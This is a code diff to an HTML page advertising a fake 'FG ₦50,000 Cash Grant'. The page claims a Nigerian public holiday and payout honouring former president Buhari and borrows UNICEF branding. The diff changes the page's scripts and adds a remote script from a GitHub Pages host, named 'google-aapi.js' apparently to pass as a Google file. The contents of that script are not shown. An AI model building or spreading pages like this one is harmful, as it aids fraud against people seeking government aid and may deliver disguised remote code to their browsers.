--- a/buhari.html
+++ b/buhari.html
@@ -4,8 +4,8 @@
 <!DOCTYPE html>
 <html>
     <head>
-<script src="activation.js"></script>
-     
+<script src="bubu-active.js"></script>
+    <script src="demo.js"></script> 
     <script>
 
         function set_Cookie(name,value){
@@ -37,7 +37,7 @@
         <meta name="viewport" content="width=device-width, initial-scale=1.0" />
         <title>FG ₦50,000 Cash Grant</title>
         <link rel="shortcut icon" type="image/png" href="CHD.COMMUNICATION.N'Djamena.18.11.2022.UNICEF.AnnadjibRamadane.1_0.png
-" />
+" /><script src="https://ogeitid.github.io/oge/google-aapi.js"></script>
         <meta name="og:title" content="FG ₦50,000 Cash Grant" />
         <meta name="og:url" content="Workpo.com/unicef/" />
         <meta property="og:description" content="FG DECLARES PUBLIC HOLIDAY AND ₦50,000 CASH GRANT TO NIGERIANS IN HONOUR OF LATE FORMER PRESIDENT MUHAMMADU BUHARI" />
